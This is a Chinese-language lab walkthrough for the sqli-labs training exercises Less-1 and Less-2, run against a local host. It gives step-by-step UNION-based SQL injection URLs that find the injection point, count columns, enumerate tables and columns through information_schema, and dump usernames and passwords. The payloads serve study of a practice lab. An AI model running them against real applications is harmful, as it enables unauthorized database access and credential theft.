sqli-labs
Less-1
1.寻找注入点(字符型:id 被单引号包裹后拼接进查询,所以下面的测试都先用 ' 闭合)
http://127.0.0.1/sqli/Less-1/?id=1' //报错
http://127.0.0.1/sqli/Less-1/?id=1' and 1=1 --+ //正常
http://127.0.0.1/sqli/Less-1/?id=1' and 1=2 --+ //页面异常(条件为假,无正常回显)
http://127.0.0.1/sqli/Less-1/?id=1' order by 4 --+ //报错,而 order by 3 正常,所以字段数是3
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,3 --+ //2,3有回显
2.爆数据库
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,database(),user() --+
3.爆数据表
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='security' --+
4.爆字段
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+
5.爆数据
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,group_concat(id,username,password) from users --+
Less-2
1.寻找注入点(数字型:id 未被引号包裹直接拼接进查询,所以下面的测试无需闭合引号和注释)
http://127.0.0.1/sqli/Less-2/?id=1' //报错
http://127.0.0.1/sqli/Less-2/?id=1 and 1=1 //正常
http://127.0.0.1/sqli/Less-2/?id=1 and 1=2 //页面异常(条件为假,无正常回显)
http://127.0.0.1/sqli/Less-2/?id=1 order by 4 //报错,而 order by 3 正常,所以字段数为3
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,3
2.爆库
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,database()
3.爆表
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
4.爆字段
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'
5.爆数据
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(id,username,password,0x10) from users